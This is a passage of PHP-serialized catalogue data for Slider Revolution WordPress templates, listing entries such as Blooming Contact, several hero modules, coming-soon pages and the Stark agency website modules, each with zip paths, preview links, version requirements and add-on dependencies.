Text\";s:5:\"alias\";s:21:\"blooming-funeral-text\";s:3:\"zip\";s:31:\"packs/blooming-funeral-text.zip\";s:3:\"uid\";s:32:\"d7c80e246f31e3d2f4e5dc1656f133cc\";s:3:\"img\";s:32:\"blooming-funeral-text/slide1.jpg\";s:7:\"preview\";s:57:\"https://revolution.themepunch.com/event-florist-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.1.5\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:175:\"<span class=\"ttm_content\">The Blooming Event Florist Template is a complete one-page website solution with beautiful floral animations.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:31:\"Blooming Event Florist Template\";s:13:\"package_order\";s:2:\"12\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"36\";s:9:\"installed\";b:0;}i:425;a:25:{s:2:\"id\";s:3:\"461\";s:5:\"title\";s:16:\"Blooming Contact\";s:5:\"alias\";s:16:\"blooming-contact\";s:3:\"zip\";s:26:\"packs/blooming-contact.zip\";s:3:\"uid\";s:32:\"54280182bca86443e2648b3146f41e47\";s:3:\"img\";s:27:\"blooming-contact/slide1.jpg\";s:7:\"preview\";s:57:\"https://revolution.themepunch.com/event-florist-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.1.5\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:175:\"<span class=\"ttm_content\">The Blooming Event Florist Template is a complete one-page website solution with beautiful floral animations.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:31:\"Blooming Event Florist Template\";s:13:\"package_order\";s:2:\"13\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"36\";s:9:\"installed\";b:0;}i:426;a:22:{s:2:\"id\";s:3:\"462\";s:5:\"title\";s:13:\"Particle Hero\";s:5:\"alias\";s:13:\"particle-hero\";s:3:\"zip\";s:17:\"particle-hero.zip\";s:3:\"uid\";s:32:\"3f422f4807bf9ef4cb15dade515dad00\";s:3:\"img\";s:24:\"particle-hero/slide1.jpg\";s:7:\"preview\";s:69:\"https://revolution.themepunch.com/wordpress-hero-image-header/#slide6\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.1.5\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:120:\"<span class=\"ttm_content\">A Hero header module using the Particle Effect Add-On.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:4:\"hero\";}s:14:\"plugin_require\";s:175:\"[{\"path\":\"revslider-particles-addon\\/revslider-particles-addon.php\",\"name\":\"Particles Effect AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:427;a:22:{s:2:\"id\";s:3:\"463\";s:5:\"title\";s:17:\"Bubble Morph Hero\";s:5:\"alias\";s:17:\"bubble-morph-hero\";s:3:\"zip\";s:21:\"bubble-morph-hero.zip\";s:3:\"uid\";s:32:\"b47e6bcc1ae80393ff3f7388ed3b9f8f\";s:3:\"img\";s:28:\"bubble-morph-hero/slide1.jpg\";s:7:\"preview\";s:69:\"https://revolution.themepunch.com/wordpress-hero-image-header/#slide5\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.1.5\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:117:\"<span class=\"ttm_content\">A Hero header module using the Bubble Morph Add-On.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:4:\"hero\";}s:14:\"plugin_require\";s:174:\"[{\"path\":\"revslider-bubblemorph-addon\\/revslider-bubblemorph-addon.php\",\"name\":\"BubbleMorph AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:428;a:22:{s:2:\"id\";s:3:\"464\";s:5:\"title\";s:13:\"Parallax Hero\";s:5:\"alias\";s:13:\"parallax-hero\";s:3:\"zip\";s:17:\"parallax-hero.zip\";s:3:\"uid\";s:32:\"290e86534326ee118e96ae7ce0538fa2\";s:3:\"img\";s:24:\"parallax-hero/slide1.jpg\";s:7:\"preview\";s:69:\"https://revolution.themepunch.com/wordpress-hero-image-header/#slide4\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.1.5\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:117:\"<span class=\"ttm_content\">A parallax hero module with mouse move interaction.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:4:\"hero\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:429;a:22:{s:2:\"id\";s:3:\"465\";s:5:\"title\";s:10:\"Video Hero\";s:5:\"alias\";s:10:\"video-hero\";s:3:\"zip\";s:14:\"video-hero.zip\";s:3:\"uid\";s:32:\"f9e280015d3408bb0482e13fe753da8f\";s:3:\"img\";s:21:\"video-hero/slide1.jpg\";s:7:\"preview\";s:69:\"https://revolution.themepunch.com/wordpress-hero-image-header/#slide3\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.1.5\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:111:\"<span class=\"ttm_content\">A simple Hero header module with HTML5 video.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:4:\"hero\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:430;a:22:{s:2:\"id\";s:3:\"466\";s:5:\"title\";s:14:\"Ken Burns Hero\";s:5:\"alias\";s:14:\"ken-burns-hero\";s:3:\"zip\";s:18:\"ken-burns-hero.zip\";s:3:\"uid\";s:32:\"d5f89e5f5b3991b995e2bfeb50cfe9f8\";s:3:\"img\";s:25:\"ken-burns-hero/slide1.jpg\";s:7:\"preview\";s:69:\"https://revolution.themepunch.com/wordpress-hero-image-header/#slide2\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.1.5\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:142:\"<span class=\"ttm_content\">A simple image background hero header module with a subtle Ken Burns effect.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:4:\"hero\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:431;a:22:{s:2:\"id\";s:3:\"467\";s:5:\"title\";s:21:\"Basic Hero Collection\";s:5:\"alias\";s:21:\"basic-hero-collection\";s:3:\"zip\";s:25:\"basic-hero-collection.zip\";s:3:\"uid\";s:32:\"ff625c65e8aab4689fa56d5652279d51\";s:3:\"img\";s:32:\"basic-hero-collection/slide1.jpg\";s:7:\"preview\";s:62:\"https://revolution.themepunch.com/wordpress-hero-image-header/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.1.5\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:153:\"<span class=\"ttm_content\">A collection of WordPress Hero Headers with image, video, particles, parallax and more!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";s:348:\"[{\"path\":\"revslider-particles-addon\\/revslider-particles-addon.php\",\"name\":\"Particles Effect AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"},{\"path\":\"revslider-bubblemorph-addon\\/revslider-bubblemorph-addon.php\",\"name\":\"BubbleMorph AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:432;a:22:{s:2:\"id\";s:3:\"468\";s:5:\"title\";s:19:\"Launching Very Soon\";s:5:\"alias\";s:19:\"launching-very-soon\";s:3:\"zip\";s:23:\"launching-very-soon.zip\";s:3:\"uid\";s:32:\"2da45cf2d9bec07e7183b3f7777986b9\";s:3:\"img\";s:30:\"launching-very-soon/slide1.jpg\";s:7:\"preview\";s:59:\"https://revolution.themepunch.com/launching-soon-countdown/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.1.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:166:\"<span class=\"ttm_content\">Rocket BOOST! A beautifully animated launching soon countdown module using our \"Coming Soon\" Add-On.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:4:\"hero\";}s:14:\"plugin_require\";s:197:\"[{\"path\":\"revslider-maintenance-addon\\/revslider-maintenance-addon.php\",\"name\":\"Coming Soon & Maintenance AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/revslider-doc\\/add-coming-soon-maintenance\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:433;a:22:{s:2:\"id\";s:3:\"469\";s:5:\"title\";s:18:\"Under Construction\";s:5:\"alias\";s:18:\"Under-Construction\";s:3:\"zip\";s:22:\"Under-Construction.zip\";s:3:\"uid\";s:32:\"4b12f9a82a5b48d45a707df93406eb5b\";s:3:\"img\";s:29:\"Under-Construction/slide1.jpg\";s:7:\"preview\";s:53:\"https://revolution.themepunch.com/under-construction/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.1.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:157:\"<span class=\"ttm_content\">You will love this animated under construction landing page using our \"Coming Soon\" Add-On.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:4:\"hero\";}s:14:\"plugin_require\";s:197:\"[{\"path\":\"revslider-maintenance-addon\\/revslider-maintenance-addon.php\",\"name\":\"Coming Soon & Maintenance AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/revslider-doc\\/add-coming-soon-maintenance\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:434;a:22:{s:2:\"id\";s:3:\"470\";s:5:\"title\";s:15:\"Particle Effect\";s:5:\"alias\";s:15:\"Particle-Effect\";s:3:\"zip\";s:19:\"Particle-Effect.zip\";s:3:\"uid\";s:32:\"66cf4e514e83a6984903694fd587edb6\";s:3:\"img\";s:26:\"Particle-Effect/slide1.jpg\";s:7:\"preview\";s:54:\"https://revolution.themepunch.com/snow-particle-scene/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.1.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:140:\"<span class=\"ttm_content\">Get into a winter mood with our Snow Particle Scene for Slider Revolution!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:4:\"hero\";}s:14:\"plugin_require\";s:175:\"[{\"path\":\"revslider-particles-addon\\/revslider-particles-addon.php\",\"name\":\"Particles Effect AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:435;a:22:{s:2:\"id\";s:3:\"471\";s:5:\"title\";s:17:\"Particle Effect 2\";s:5:\"alias\";s:17:\"Particle-Effect-2\";s:3:\"zip\";s:21:\"Particle-Effect-2.zip\";s:3:\"uid\";s:32:\"303337c29a97a816ccecca7e5f0b5e20\";s:3:\"img\";s:28:\"Particle-Effect-2/slide1.jpg\";s:7:\"preview\";s:56:\"https://revolution.themepunch.com/cyber-particle-effect/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.1.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:147:\"<span class=\"ttm_content\">Amaze your website visitors with the cyber particle effect for Slider Revolution!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:4:\"hero\";}s:14:\"plugin_require\";s:175:\"[{\"path\":\"revslider-particles-addon\\/revslider-particles-addon.php\",\"name\":\"Particles Effect AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:436;a:25:{s:2:\"id\";s:3:\"472\";s:5:\"title\";s:22:\"Stark Website Template\";s:5:\"alias\";s:22:\"stark-website-template\";s:3:\"zip\";s:0:\"\";s:3:\"uid\";s:30:\"stark-website-template-package\";s:3:\"img\";s:43:\"packages/stark-website-template-package.jpg\";s:7:\"preview\";s:64:\"https://revolution.themepunch.com/stark-agency-website-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.1.6\";s:5:\"width\";s:4:\"1024\";s:6:\"height\";s:3:\"768\";s:11:\"description\";s:221:\"<span class=\"ttm_content\">The Stark Agency website template is a collection of modules using our new Gutenberg Block \"margin & padding\" feature. Create unique, customizable layouts!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:22:\"Stark Website Template\";s:13:\"package_order\";s:1:\"0\";s:14:\"package_parent\";s:4:\"true\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"37\";s:9:\"installed\";b:0;}i:437;a:25:{s:2:\"id\";s:3:\"473\";s:5:\"title\";s:10:\"Stark Menu\";s:5:\"alias\";s:10:\"stark-menu\";s:3:\"zip\";s:20:\"packs/stark-menu.zip\";s:3:\"uid\";s:32:\"bb31150df180e784d76a1f5ea306bf05\";s:3:\"img\";s:21:\"stark-menu/slide1.jpg\";s:7:\"preview\";s:64:\"https://revolution.themepunch.com/stark-agency-website-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.1.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:221:\"<span class=\"ttm_content\">The Stark Agency website template is a collection of modules using our new Gutenberg Block \"margin & padding\" feature. Create unique, customizable layouts!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:22:\"Stark Website Template\";s:13:\"package_order\";s:1:\"1\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:87:\"offset=\"t:0px,0px,0px,0px;b:0px,0px,0px,0px;l:140px,70px,0px,0px;r:140px,70px,0px,0px;\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"37\";s:9:\"installed\";b:0;}i:438;a:25:{s:2:\"id\";s:3:\"474\";s:5:\"title\";s:12:\"Stark Header\";s:5:\"alias\";s:12:\"stark-header\";s:3:\"zip\";s:22:\"packs/stark-header.zip\";s:3:\"uid\";s:32:\"62bfca01bf6e33cfad81d8df06498299\";s:3:\"img\";s:23:\"stark-header/slide1.jpg\";s:7:\"preview\";s:64:\"https://revolution.themepunch.com/stark-agency-website-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.1.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:221:\"<span class=\"ttm_content\">The Stark Agency website template is a collection of modules using our new Gutenberg Block \"margin & padding\" feature. Create unique, customizable layouts!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:22:\"Stark Website Template\";s:13:\"package_order\";s:1:\"2\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:93:\"offset=\"t:40px,30px,20px,10px;b:0px,0px,0px,0px;l:40px,30px,20px,10px;r:40px,30px,20px,10px;\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"37\";s:9:\"installed\";b:0;}i:439;a:25:{s:2:\"id\";s:3:\"475\";s:5:\"title\";s:13:\"Stark Content\";s:5:\"alias\";s:13:\"stark-content\";s:3:\"zip\";s:23:\"packs/stark-content.zip\";s:3:\"uid\";s:32:\"4577ca760133eb5d894c46f212f6eefb\";s:3:\"img\";s:24:\"stark-content/slide1.jpg\";s:7:\"preview\";s:64:\"https://revolution.themepunch.com/stark-agency-website-template/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:6:\"6.2.22\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:221:\"<span class=\"ttm_content\">The Stark Agency website template is a collection of modules using our new Gutenberg Block \"margin & padding\" feature. Create unique, customizable layouts!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:22:\"Stark Website Template\";s:13:\"package_order\";s:1:\"3\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:110:\"offset=\"t:-50px,-30px,-30px,-20px;b:0px,0px,0px,0px;l:140px,70px,50px,30px;r:140px,70px,50px,30px;\" zindex=\"6\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"37\";s:9:\"installed\";b:0;}i:440;a:25:{s:2:\"id\";s:3:\"476\";s:5:\"title\";s:14:\"Stark Carousel\";s:5:\"alias\";s:14:\"stark-carousel\";s:3:\"zip\";s:24:\"packs/stark-carousel.zip\";s:3:\"uid\";s:32:\"de63336d333eeff10eccfd5d9741e6c9\";s:3:\"img\";s:25:\"stark-carousel/slide1.jpg\";s:7:\"preview\";s:64:\"https://revolution.themepunch.com/stark-agency-website-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.1.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:221:\"<span class=\"ttm_content\">The Stark Agency website template is a collection of modules using our new Gutenberg Block \"margin & padding\" feature. Create unique, customizable layouts!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:22:\"Stark Website Template\";s:13:\"package_order\";s:1:\"4\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:108:\"offset=\"t:-50px,-30px,-30px,-20px;b:0px,0px,0px,0px;l:40px,30px,20px,10px;r:40px,30px,20px,10px;\" zindex=\"1\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"37\";s:9:\"installed\";b:0;}i:441;a:26:{s:2:\"id\";s:3:\"477\";s:5:\"title\";s:15:\"Stark Portfolio\";s:5:\"alias\";s:15:\"stark-portfolio\";s:3:\"zip\";s:25:\"packs/stark-portfolio.zip\";s:3:\"uid\";s:32:\"99fcf3df65f8471fe30bec1bf0c2350d\";s:3:\"img\";s:26:\"stark-portfolio/slide1.jpg\";s:7:\"preview\";s:64:\"https://revolution.themepunch.com/stark-agency-website-template/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:6:\"6.2.22\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:221:\"<span class=\"ttm_content\">The Stark Agency website template is a collection of modules using our new Gutenberg Block \"margin & padding\" feature. Create unique, customizable layouts!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:22:\"Stark Website Template\";s:13:\"package_order\";s:1:\"5\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:110:\"offset=\"t:-50px,-30px,-30px,-20px;b:0px,0px,0px,0px;l:140px,70px,50px,30px;r:140px,70px,50px,30px;\" zindex=\"5\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"37\";s:9:\"installed\";b:0;s:6:\"is_new\";b:1;}i:442;a:25:{s:2:\"id\";s:3:\"478\";s:5:\"title\";s:22:\"Stark Portfolio Detail\";s:5:\"alias\";s:22:\"stark-portfolio-detail\";s:3:\"zip\";s:32:\"packs/stark-portfolio-detail.zip\";s:3:\"uid\";s:32:\"7484fc54f81daec07c93e992216310ce\";s:3:\"img\";s:33:\"stark-portfolio-detail/slide1.jpg\";s:7:\"preview\";s:64:\"https://revolution.themepunch.com/stark-agency-website-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.1.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:221:\"<span class=\"ttm_content\">The Stark Agency website template is a collection of modules using our new Gutenberg Block \"margin & padding\" feature. Create unique, customizable layouts!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:6:\"slider\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:22:\"Stark Website Template\";s:13:\"package_order\";s:1:\"6\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"1\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"37\";s:9:\"installed\";b:0;}i:443;a:25:{s:2:\"id\";s:3:\"479\";s:5:\"title\";s:13:\"Stark Contact\";s:5:\"alias\";s:13:\"stark-contact\";s:3:\"zip\";s:23:\"packs/stark-contact.zip\";s:3:\"uid\";s:32:\"8d704226b7093123a9d9faf424da6c35\";s:3:\"img\";s:24:\"stark-contact/slide1.jpg\";s:7:\"preview\";s:64:\"https://revolution.themepunch.com/stark-agency-website-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.1.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:221:\"<span class=\"ttm_content\">The Stark Agency website template is a collection of modules using our new Gutenberg Block \"margin & padding\" feature. Create unique, customizable layouts!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution 